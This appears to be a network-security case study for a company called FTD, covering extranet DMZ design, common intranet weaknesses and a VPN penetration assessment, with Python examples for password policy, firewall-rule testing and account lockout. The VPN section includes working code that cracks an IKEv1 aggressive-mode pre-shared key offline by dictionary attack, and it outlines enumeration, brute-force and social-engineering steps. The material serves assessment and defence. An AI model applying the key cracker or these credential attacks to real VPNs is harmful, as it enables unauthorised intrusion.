The use of modems to connect to the company's network increases the potential for intruders to use war dialers or other means to dial into the network, access sensitive information, or damage the network itself.
We have decided to phase out dial-in access completely. Residential ISPs and most hotel Internet access have moved away from dial-in service and offer connections much faster than dial-up, and adding hardware such as callback devices to secure dial-in access costs more than moving all remote access to a VPN over the Internet.
The purpose of extranets is to reduce the cost of managing and exchanging information between organizations, but this has to be achieved without sacrificing security. Several technologies address the security issues of extranets: digital signatures, single sign-on, smart cards, biometrics, public key infrastructure, VPNs, firewalls, intrusion detection software, and so on.
Companies often use the eggshell model of defense (hard on the outside, soft on the inside), in which an intruder who gains access through the extranet connection compromises the entire network. This is why a defense-in-depth model is more appropriate for an extranet. Normally, demonstrated conformance with ISO/IEC 17799 (the code of practice now published as ISO/IEC 27002) gives business partners a way to show that they follow standard security practices, and an extranet security contract establishes the obligations of each side. This provides a degree of trust between business partners, but even with such measures it is necessary to adhere to the saying "Trust, but verify." That a business partner abides by the best security practices available does not mean that they cannot become overly curious, and being business partners on one front does not exclude the possibility that the same partners are competitors on another front.
The current layout of the FTD network places the web server, running IIS 5.0 on Windows 2000, on the internal network of the main office in Albany, NY. This poses the following security issues:
• Having the web server on the internal network puts the entire internal network at risk: because the extranet accepts outside connections, a compromise of the server opens a door into the internal network.
• Because IIS 5.0 is part of the operating system, the operating system's lifecycle applies to it. Windows 2000 is in extended support until July 2010; when support for the operating system ends, there will be no support or security updates for IIS 5.0 either.
• The e-commerce software is outsourced to a small company that manages the web server remotely. There is no security monitoring of their activity, even though they have direct access to the internal network and to confidential information.
• Network traffic, especially during peak hours, is extremely slow or comes to a complete halt.
The security issues found in the current layout of the FTD network also include a couple of complaints from the CEO and the employees stated in the case study. The CEO is displeased with the performance of the WAN because of the network traffic issues. The Research and Development Department uses much of the bandwidth, which has caused other employees to complain about bandwidth at peak hours. Even though it is not stated as a complaint, the Research and Development Department and the manufacturing plant have an explicit need to keep their data confidential.
In the Information Security Management Handbook, there are several points that must be included in an extranet security policy:
• The extranet must be securely partitioned from the company intranet
• Secure network connectivity must be provided using a dedicated line or using a virtual private network
• Extranet users must be uniquely identified using adequate authentication techniques
• Authorization must adhere to the principle of least privilege
• Extranet managers will receive monthly access reports to verify the proper use of the network
• The extranet must not provide a routable path to the participant networks (i.e. the extranet provider's network should not allow packets to flow between partner networks)
• A real-time monitoring, auditing, and alerting facility must be employed to detect fraud and abuse (King, p 102).
Source: Christopher King, "Extranet Access Control Issues", Information Security Management Handbook Vol.2, 2000
A common and effective practice for securing the network when connecting an internal LAN to an external network, such as an extranet, is to install a network DMZ. The DMZ provides a tightly managed buffer between the internal network and the external network. It is set up by installing one firewall on the incoming external line and another at the connection to the internal network; the systems installed between the two firewalls are in the DMZ. The DMZ provides a secure partition between the extranet and the provider's intranet, and the inner firewall should permit only the specific flows the DMZ systems need (for example, the web server to a database), so that a compromised DMZ host does not gain free access to the internal network.
Aside from a secure network layout, additional security software should provide intrusion detection, authentication, encryption, and auditing of logged activity. Upgrading software to stay within the manufacturer's support is vital for receiving security updates that address vulnerabilities, and newer versions often add features that improve security. Switching from IIS 5.0 on Windows 2000 to IIS 7.0 on Windows Server 2008 gives the company a server with better security features (a modular design that installs only the components actually needed, and built-in request filtering) and current support from the manufacturer.
INTRANET VULNERABILITY ASSESSMENT AND PENETRATION TESTING
The FTD intranet provides the company with the means to share information among its employees across departments using browser-based applications. But the fact that access to the intranet is restricted to users within the company does not mean that it is any more secure than a public network like the Internet. Any network is vulnerable; even the most secure network, with measures against all known threats, is still susceptible to newly found exploits.
The FBI has released statistics showing that 72% of crimes such as theft, fraud, and sabotage are committed by the company's own employees, another 20% by external parties such as business partners and consultants who were given access to systems and information, and only 8% by outsiders with no relation to the company. The typical computer criminal is a non-technical authorized user of the system who has been around long enough to locate the control deficiencies.
When reviewing the security of an intranet, besides the usual targets such as information, access, and content controls, the operating system and network devices must be considered as well. It often surprises managers that intranet issues involving browser security and access controls are caused by a specific device or type of device.
When auditing the security of an intranet, aside from the internal vulnerabilities, new threats are likely to appear if the intranet is connected to the Internet.
Among these new threats, the most common are users unintentionally allowing a virus to infect the intranet and intruders gaining access to confidential company data. Wireless access presents another series of threats that system administrators must take into account when auditing network security.
There are ten common security issues found in a company's intranet, even though they are not exclusive to intranets. While it is unusual to find all of them in the same intranet, almost any intranet will exhibit at least one of them, even if its security has been audited before.
1. Encryption
There is software that provides a secure server/client connection with authentication and encryption, such as SSL/TLS (Secure Sockets Layer / Transport Layer Security), Secure HTTP, or proprietary solutions. The first line of defense in intranet security should be an authenticated logon, strengthened by encrypting all intranet traffic, not just the username and password. These measures should be specified in the security policy.
Suggestion: Convert all authentication and logon functions to more secure mechanisms such as Kerberos (preferred over NTLM, which is exposed to relay and pass-the-hash attacks), SSL/TLS, or equivalents.
2. Access Control
When securing a network, there should be both software and hardware access controls. Access to the intranet should be limited to internal connections, and when remote access is needed it should be specified in the security policy. The policy should limit access depending on the responsibilities or job of the user, giving specific employees or groups access only to the content they need.
Suggestion: Communicating the security policy to the appropriate individuals is crucial to reinforce the idea that users should not try to gain access to confidential information they are not meant to access. Access controls should be in place and verified to be working properly.
3. Passwords
The company's security policy should require users to change their password at least every 60 days; the new password must differ from previously used passwords and meet a minimum level of complexity, such as a minimum length and required character classes.
Suggestion: Enforcing this policy with automated settings in the administrative console (on Windows, the Password Policy under Account Policies in Group Policy) is relatively easy but often overlooked.
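The rules above can be checked automatically at password-change time. The following is an added example, not code from the case study; the 60-day age comes from the policy, while the 12-character minimum, three required character classes and five-password history are assumptions. Old passwords are kept only as salted PBKDF2 digests so the history store itself never reveals them.

```python
"""Password-policy check: minimum length and complexity, no reuse of recent
passwords, and a 60-day maximum age.  Added example with constructed data;
every number except the 60-day age is an assumption."""
import hashlib
import hmac
import os
from datetime import date, timedelta

MIN_LENGTH = 12        # assumption: the policy only requires "a minimum length"
MIN_CLASSES = 3        # assumption: three of lowercase / uppercase / digit / symbol
HISTORY_DEPTH = 5      # assumption: how many previous passwords may not be reused
MAX_AGE_DAYS = 60      # from the policy
PBKDF2_ROUNDS = 100_000


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; the history store keeps only (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def matches(password, salt, digest):
    """Constant-time comparison against one stored history entry."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


def complexity_problems(password):
    """Return the complexity rules the password violates (empty list if none)."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    classes = (
        any(c.islower() for c in password),
        any(c.isupper() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() for c in password),
    )
    if sum(classes) < MIN_CLASSES:
        problems.append("needs at least %d of: lowercase, uppercase, digit, symbol" % MIN_CLASSES)
    return problems


def check_new_password(password, history):
    """history: list of (salt, digest) pairs, most recent first.
    Returns every reason the new password must be rejected."""
    problems = complexity_problems(password)
    if any(matches(password, salt, digest) for salt, digest in history[:HISTORY_DEPTH]):
        problems.append("reused within the last %d passwords" % HISTORY_DEPTH)
    return problems


def password_expired(last_changed, today):
    """Both arguments are ISO dates (YYYY-MM-DD); True once older than MAX_AGE_DAYS."""
    age = date.fromisoformat(today) - date.fromisoformat(last_changed)
    return age > timedelta(days=MAX_AGE_DAYS)


if __name__ == "__main__":
    # Constructed user record with one previous password in the history.
    history = [hash_password("Albany-Spring-2010")]
    print(check_new_password("Albany-Spring-2010", history))   # reused
    print(check_new_password("ftd", history))                  # too short and too simple
    print(check_new_password("Hudson-Valley-77", history))     # [] -> accepted
    print(password_expired("2010-01-01", "2010-03-03"))        # True: 61 days old
```

The expiry check is deliberately separate from the change-time check so a logon process can call it on every authentication and force a change, which is what the Group Policy setting does for domain accounts.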
4. Content Publishing and Management
Because the intranet is meant to make the exchange of information and applications easier among employees, someone must be responsible for making changes such as posting new web pages or deleting old ones from the intranet portal. Designated owners, the people who may add, remove, and change content on servers and web pages, should be the only ones with the permissions to perform these functions. Some content, depending on its source or type, should require digital signatures, which provide additional authentication, integrity, and non-repudiation.
Suggestion: Each job function should be verified and updated as necessary; at minimum it should specify ownership of data and pages and the corresponding permission rights.
5. Firewall Set Up
Configuring a firewall properly is an important task: even a firewall that is placed correctly in the network will not do the job it is supposed to without proper configuration. Rushing a firewall installation and activating it with default settings is a common mistake in network security. A firewall configuration must be tested to ensure it operates correctly. Software firewalls like BlackICE Defender or hardware firewalls like LuciGate have default settings that allow probes from within an intranet that can be used to identify vulnerabilities or exploits.
Suggestion: The administrator must ensure that firewalls are properly configured. Regular security audits will help catch the most common setup mistakes.
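One way to test a firewall configuration before deploying it is to model the ruleset and run the policy's requirements against it as test cases. The block below is an added example for both the two-firewall DMZ described in the extranet section and the firewall setup item above; it is not code from the case study. The addresses (RFC 5737 test ranges and a private range), the rules, the database port and the "rushed" variant are all constructed, and the model is a first-match filter with a default deny, which is how most real firewalls behave.

```python
"""Tabletop test of a two-firewall DMZ: a first-match packet-filter model so a
ruleset can be checked against the flows the policy requires before deployment.
Added example; every address and rule is constructed."""
import ipaddress

ANY = ipaddress.ip_network("0.0.0.0/0")
DMZ = ipaddress.ip_network("192.0.2.0/24")        # constructed DMZ range
INTERNAL = ipaddress.ip_network("10.10.0.0/16")   # constructed internal range
WEB = ipaddress.ip_network("192.0.2.10/32")       # extranet web server in the DMZ
DB = ipaddress.ip_network("10.10.5.20/32")        # database the web tier needs


class Rule:
    def __init__(self, action, src, dst, dport=None):
        self.action, self.src, self.dst, self.dport = action, src, dst, dport

    def hits(self, src, dst, dport):
        return src in self.src and dst in self.dst and self.dport in (None, dport)


def evaluate(rules, src, dst, dport):
    """First matching rule wins; nothing matching means deny (default deny)."""
    for rule in rules:
        if rule.hits(src, dst, dport):
            return rule.action
    return "deny"


def zone(ip):
    if ip in DMZ:
        return "dmz"
    if ip in INTERNAL:
        return "internal"
    return "internet"


# Outer firewall sits on the external line, inner firewall on the internal link.
OUTER = [
    Rule("allow", ANY, WEB, 443),
    Rule("allow", ANY, WEB, 80),
    Rule("allow", INTERNAL, ANY),      # staff browsing out
    Rule("deny", ANY, ANY),            # everything else, including straight to the intranet
]
INNER = [
    Rule("allow", WEB, DB, 1433),      # the only DMZ -> internal flow permitted
    Rule("deny", DMZ, INTERNAL),       # a compromised DMZ host gets nothing else
    Rule("allow", INTERNAL, ANY),      # internal users reach the DMZ and the Internet
    Rule("deny", ANY, ANY),
]

# Which firewalls a flow crosses, keyed by (source zone, destination zone).
PATH = {
    ("internet", "dmz"): ["outer"],
    ("internet", "internal"): ["outer", "inner"],
    ("dmz", "internet"): ["outer"],
    ("dmz", "internal"): ["inner"],
    ("internal", "dmz"): ["inner"],
    ("internal", "internet"): ["inner", "outer"],
}


def decide(firewalls, src, dst, dport):
    """A flow is allowed only if every firewall on its path allows it."""
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for hop in PATH.get((zone(src), zone(dst)), []):
        if evaluate(firewalls[hop], src, dst, dport) != "allow":
            return "deny"
    return "allow"


def audit(firewalls, expectations):
    """Return the flows whose outcome differs from what the policy requires."""
    failures = []
    for src, dst, dport, wanted in expectations:
        got = decide(firewalls, src, dst, dport)
        if got != wanted:
            failures.append((src, dst, dport, wanted, got))
    return failures


# Policy requirements written as test cases; 203.0.113.5 is a constructed outside host.
EXPECTED = [
    ("203.0.113.5", "192.0.2.10", 443, "allow"),   # customers reach the web server
    ("203.0.113.5", "192.0.2.10", 3389, "deny"),   # no remote desktop from the Internet
    ("203.0.113.5", "10.10.5.20", 1433, "deny"),   # no direct path to the intranet
    ("192.0.2.10", "10.10.5.20", 1433, "allow"),   # web tier to its database only
    ("192.0.2.10", "10.10.5.21", 445, "deny"),     # not to the file share next to it
    ("10.10.7.3", "203.0.113.5", 443, "allow"),    # staff out to the Internet
]

GOOD = {"outer": OUTER, "inner": INNER}
# The "activated with default settings" mistake: an any-port allow into the DMZ placed first.
RUSHED = {"outer": [Rule("allow", ANY, DMZ)] + OUTER, "inner": INNER}

if __name__ == "__main__":
    print(audit(GOOD, EXPECTED))     # []
    print(audit(RUSHED, EXPECTED))   # the RDP case now comes back "allow"
```

The value of the exercise is the EXPECTED list: it is the policy written down as observable outcomes, and it is what a periodic audit should re-run after every rule change rather than reading the rules by eye.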
6. Remote Access
Dial-up access and wireless access must be handled carefully. Any type of remote access that lands behind the firewalls is a vulnerability to the network and must be constantly monitored. Configuring wireless security, WPA rather than WEP (whose keys can be recovered from captured traffic in minutes), is a necessary precaution against unauthorized users gaining access to the intranet. A VPN allows users to make a secure connection to the intranet while using Internet resources outside the firewall. But if a user's login and password are compromised, even the VPN will not protect the intranet from intruders.
Suggestion: When testing the company's remote access system, ensure that the security audit analyzes and resolves all vulnerabilities and exploits in the virtual private network.
7. Manage E-Mail
For most companies, email is a crucial part of internal communications, and many professionals treat it as a replacement for paper mail, which it is not. An active approach to email security is very important; all authorized users must at least know the company's email security policy and the risks of unencrypted email. Emails can be intercepted, and copies of a message often reside in multiple places: the sender's PC, the company's mail server, the ISP's mail server, the recipient's PC, and possibly a mail backup server. Encrypting email is the best way to secure email communication; tracking, monitoring, and archiving messages also improves email security.
Suggestion: Verify that the mail system in use supports S/MIME (Secure/Multipurpose Internet Mail Extensions). Support alone encrypts nothing: users need certificates issued to them, and the policy must require signing and encryption for sensitive mail.
8. Viruses and Rogue Code
Besides installing antivirus software, proper configuration, such as mail client monitoring, browser monitoring of web pages with executables, and write protection, is part of configuring an antivirus product correctly. Java and other executable content embedded in web pages, or attachments opened by an application, can contain rogue code that compromises the entire network.
Suggestion: The company's security policy must address antivirus software and the configuration of executables that are automatically launched by applications.
9. Standard Software
Security policies must address the installation and use of third-party software on company computers, and enforcing these policies is just as important. The system administrator should be the only source of any software installed on a device connected to the company's network. Having a standard web browser, with its security settings configured with the proper permissions, is a basic step toward improving network security. Allowing users to install third-party software on a networked device is often a source of Trojan horses, sniffers, worms, rootkits, and zombie code.
Suggestion: Conducting regular automated sweeps of the software on network devices can detect and remove unauthorized software. Regular software maintenance (patching) should be performed by an authorized source to ensure that vulnerabilities are repaired on all servers and desktops.
10. Security Audit
There are many local, national, and international firms that provide security audits of company intranets. For example, META Security Group and AT&T offer a wide range of security audit services, combining tests run remotely to find vulnerabilities exploitable from external sources with tests run from within the company's network to assess vulnerabilities exploitable from internal sources. The security audit usually has at least three parts: the audit is performed and the results are reviewed with the company's IT staff; the necessary fixes are applied to correct the findings of the initial audit; and the audit is repeated to ensure that all findings have been fixed. Too often companies do not make security audits a regular part of their security policy. The cost of an audit varies with the size of the network and the range of testing done. These tests often cover trust relationships, internal categorization, roles and permissions, communication lines, and responsibilities. A network map showing the physical, logical, and organizational layout helps in developing a good security policy.
Suggestion: A security audit should be performed at least annually, with monthly spot checks of all the weak points of the intranet.
VIRTUAL PRIVATE NETWORK ASSESSMENT
A VPN is the best way to provide cost-effective and secure remote access for employees and inter-office communications. But a poorly configured VPN can turn into direct access into the network for an intruder, since it bypasses the outer firewalls and the security controls behind them. Statistics cited in the literature attribute about 90% of successful VPN attacks to poor configuration that in turn compromised the internal network. A VPN security assessment is meant to secure remote access against intruders who may use the VPN tunnel to reach the internal network, to verify that the encrypted tunnel is complemented by end-to-end security, and to verify the security of the SSL VPN and IPsec VPN. The assessment consists of a series of external and internal tests, including a VPN vulnerability scan, an architecture review, and a policy and procedure review. The first part of the testing is done "blind": no information about the VPN is given other than the target IP address of the VPN server. This part fingerprints the server, which reveals what equipment is in use and which exploits may apply to it. Next, the VPN is tested for weaknesses in the authentication challenge and response; the most common findings are username enumeration and offline key cracking. For example, if the target uses an IPsec VPN with pre-shared keys and accepts IKE aggressive mode, the responder's IKE hash is captured and the pre-shared key is recovered offline with a dictionary or brute-force attack. Digital certificates, certification authorities, and the cipher suites offered must also be tested to rule out information leakage and weak encryption ciphers that would make the VPN traffic easy to decrypt. If the VPN has no lockout policy, username enumeration followed by a dictionary or brute-force attack on the password can compromise the VPN.
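The "IKE hash cracking" step works because, in IKEv1 aggressive mode with pre-shared keys, the responder's HASH_R travels in the clear and every other input to it is either chosen by the initiator or also sent unencrypted, so one captured exchange is enough for an offline dictionary attack. The block below is an added example, not code from the case study or from any assessment tool; the derivation follows RFC 2409 with HMAC-SHA1 as the prf, and all nonces, cookies, Diffie-Hellman values, the identity and the weak key are constructed and shortened (real nonces and DH public values are much longer).

```python
"""Offline recovery of an IKEv1 pre-shared key from a captured aggressive-mode
exchange.  Added example; values are constructed and shortened.
SKEYID and HASH_R follow RFC 2409 sections 5 and 5.1 with HMAC-SHA1 as the prf."""
import hashlib
import hmac


def prf(key, data):
    return hmac.new(key, data, hashlib.sha1).digest()


def hash_r(psk, ni, nr, g_xi, g_xr, cky_i, cky_r, sai, idir):
    """HASH_R as the responder sends it, unencrypted, in the second aggressive-mode message:
        SKEYID = prf(PSK, Ni_b | Nr_b)
        HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Every input except PSK is known to whoever initiated the exchange."""
    skeyid = prf(psk, ni + nr)
    return prf(skeyid, g_xr + g_xi + cky_r + cky_i + sai + idir)


def capture_exchange(psk):
    """Constructed stand-in for a packet capture: the attacker chose Ni, g^xi, CKY-I
    and SAi itself and read Nr, g^xr, CKY-R, IDir and HASH_R off the wire."""
    fields = dict(
        ni=bytes.fromhex("a1a2a3a4a5a6a7a8"),
        nr=bytes.fromhex("b1b2b3b4b5b6b7b8"),
        g_xi=bytes.fromhex("c1" * 16),
        g_xr=bytes.fromhex("d1" * 16),
        cky_i=bytes.fromhex("0102030405060708"),
        cky_r=bytes.fromhex("1112131415161718"),
        sai=bytes.fromhex("0000000100000001"),
        idir=b"\x02\x00\x00\x00" + b"vpn.ftd.example",   # ID_FQDN payload body, constructed name
    )
    return fields, hash_r(psk.encode(), **fields)


def crack_psk(fields, target, wordlist):
    """Dictionary attack: recompute HASH_R per candidate and compare.  No further
    traffic to the VPN is needed, so lockout policies never see the attempts."""
    for word in wordlist:
        if hmac.compare_digest(hash_r(word.encode(), **fields), target):
            return word
    return None


if __name__ == "__main__":
    fields, captured = capture_exchange("ftd2010")   # constructed weak PSK
    print(crack_psk(fields, captured, ["password", "letmein", "ftd2010"]))   # ftd2010
```

The defensive conclusion is that a pre-shared key used with aggressive mode is only as strong as its resistance to guessing: either make it long and random, or remove the PSK altogether by authenticating the gateway with certificates (or IKEv2 with certificates or EAP).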
Once a login and password have been obtained, the testing moves on to evaluate the risk of credential theft, through techniques such as social engineering against an unaware helpdesk agent or the compromise of a stolen laptop with cached VPN credentials. With the valid credentials, the testing then determines the access level of the user and the possibilities for privilege escalation through the network. The online guessing attacks can be countered by login policies such as account lockout and limits on concurrent logins; stolen credentials are not stopped by these controls, which is why the theft scenarios are tested separately.
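What those login policies look like in code, as an added example rather than anything from the case study: failures are counted per account over a window, the account locks after a threshold, unknown usernames and wrong passwords get the same answer (and the same verification cost) so the login cannot be used for username enumeration, and a cap on live sessions catches the same credentials being used from several places at once. The thresholds, the user record and the dummy record are constructed assumptions.

```python
"""Login gate: windowed account lockout, uniform denial for unknown users and
wrong passwords, and a cap on concurrent sessions.  Added example; thresholds
and the user store are constructed."""
import hashlib
import hmac
import os

MAX_FAILURES = 5         # assumption: failures before lockout
WINDOW_SECONDS = 900     # assumption: failures counted over 15 minutes
LOCKOUT_SECONDS = 1800   # assumption: lock lasts 30 minutes
MAX_SESSIONS = 2         # assumption: live sessions allowed per account
ROUNDS = 50_000


def make_record(password):
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)


# Constructed user store.  The dummy record gives unknown usernames the same
# verification cost as real ones, so response time does not reveal which names exist.
USERS = {"alice": make_record("Hudson-Valley-77")}
DUMMY = make_record(os.urandom(8).hex())


def verify(username, password):
    salt, digest = USERS.get(username, DUMMY)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)
    return username in USERS and hmac.compare_digest(candidate, digest)


class LoginGate:
    def __init__(self):
        self.failures = {}       # username -> timestamps of recent failures
        self.locked_until = {}   # username -> time the lock expires
        self.sessions = {}       # username -> number of live sessions

    def attempt(self, username, password, now):
        """Returns "ok" or "denied"; the reason belongs in the audit log, never in the reply."""
        if self.locked_until.get(username, 0) > now:
            return "denied"      # stays locked even if this guess is correct
        if not verify(username, password):
            recent = [t for t in self.failures.get(username, []) if now - t < WINDOW_SECONDS]
            recent.append(now)
            self.failures[username] = recent   # unknown names are counted too
            if len(recent) >= MAX_FAILURES:
                self.locked_until[username] = now + LOCKOUT_SECONDS
            return "denied"
        if self.sessions.get(username, 0) >= MAX_SESSIONS:
            return "denied"      # same credentials in use from too many places
        self.failures.pop(username, None)
        self.sessions[username] = self.sessions.get(username, 0) + 1
        return "ok"

    def logout(self, username):
        self.sessions[username] = max(0, self.sessions.get(username, 0) - 1)


if __name__ == "__main__":
    gate = LoginGate()
    for t in range(5):
        print(gate.attempt("alice", "guess%d" % t, t))          # denied x5 -> locked
    print(gate.attempt("alice", "Hudson-Valley-77", 10))         # denied: still locked
    print(gate.attempt("alice", "Hudson-Valley-77", 10 + 1800))  # ok
```

Lockout has a cost of its own: an attacker who knows a username can lock the legitimate user out on purpose, so the lock should be temporary and the lockouts themselves should be alerted on, as the monitoring requirement in the extranet policy already demands.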
Clientless SSL VPN software that is used through a web browser can expose authorized users to man-in-the-middle attacks, as revealed in an advisory issued by US-CERT (the United States Computer Emergency Readiness Team): "An attacker could use these devices to bypass authentication or conduct other Web-based attacks."
By using encryption at lower protocol layers, a secure connection can be made across an insecure network like the Internet. But proper configuration, as elsewhere in the network, is crucial, because the default VPN settings shipped by many manufacturers are chosen for usability rather than security.
A good security policy will ensure that only InfoSec-approved VPN clients are used and that users of equipment that is not company-owned must configure it to comply with the company's VPN and network policies.
Oak Ridge National Laboratory of the Department of Energy
http://www.csm.ornl.gov/~dunigan/vpn.html
Issues in Intranet Security, Intranet Journal
http://www.intranetjournal.com/features/isecurity.shtml
Creating a secure intranet environment, Inside Knowledge
http://www.ikmagazine.com/xq/asp/txtSearch.competitive+intelligence/exactphrase.1/sid.0/articleid.32BF50E9-B620-4140-AC9E-EC514AAF18C4/qx/display.htm
Ten Intranet Security Pitfalls, Intranets
http://www.intranetstoday.com/Articles/Editorial/Features/Ten-Intranet-Security-Pitfalls--56721.aspx
Intranet Security Solution, Huawei 3COM
http://www.smartinfo.com.hk/huawei-3com/june2005china/solutions.pdf
Hacking Intranet Websites From The Outside, White Hat Security
http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Grossman.pdf
Internet and Intranet Security, IT Services Division, Department of Administration, State of Montana
http://itsd.mt.gov/content/policy/policies/Legacy_Policy/Statewide_Policy_Internet_and_Intranet_Security.pdf
Intranet vulnerabilities can weaken the best defense, Toolbox.com
http://it.toolbox.com/blogs/adventuresinsecurity/intranet-vulnerabilities-can-weaken-even-the-best-defense-18094
Handbook of Information Security Management, Micki Krause, Harold F. Tipton
http://www.cccure.org/Documents/HISM/ewtoc.html
Dial In Testing, Penetration Testing Group, Portcullis Computer Security Ltd
http://www.penetration-testing-group.co.uk/dial.htm
Dial In or RAS Security Testing, Foreground Security
http://www.foregroundsecurity.com/services/security-audit-and-testing/dial-in-or-ras-security-testing
Alphabetical List of Vulnerability Assessment Products
http://www.timberlinetechnologies.com/products/vulnerability.html
Security Considerations for Extranets
http://www.sans.org/reading_room/whitepapers/basics/security-considerations-extranets_527
Extranets: The Weakest Link & Security
http://www.sans.org/reading_room/whitepapers/basics/extranets-weakest-link-security_432
Who do you distrust and how much does it cost?
http://extranet.isnie.org/uploads/isnie2008/weber_mcevily_radzevick.pdf
Vulnerability scanners
http://www.cotse.com/tools/vuln.htm
Extranet/Intranet Cracker - Dictionary Attack
http://www.nezperce.com/~joe/matt/program/vb/Tutorials/Extranet_Intranet_Cracker/index.html
Internet, Intranet, and Extranet Security
http://fse.tibiscus.ro/anale/Lucrari2009/082.%20Munteanu.pdf
Optimal Extranet Security: A Methodology. Steve Hunt. Giga Information Group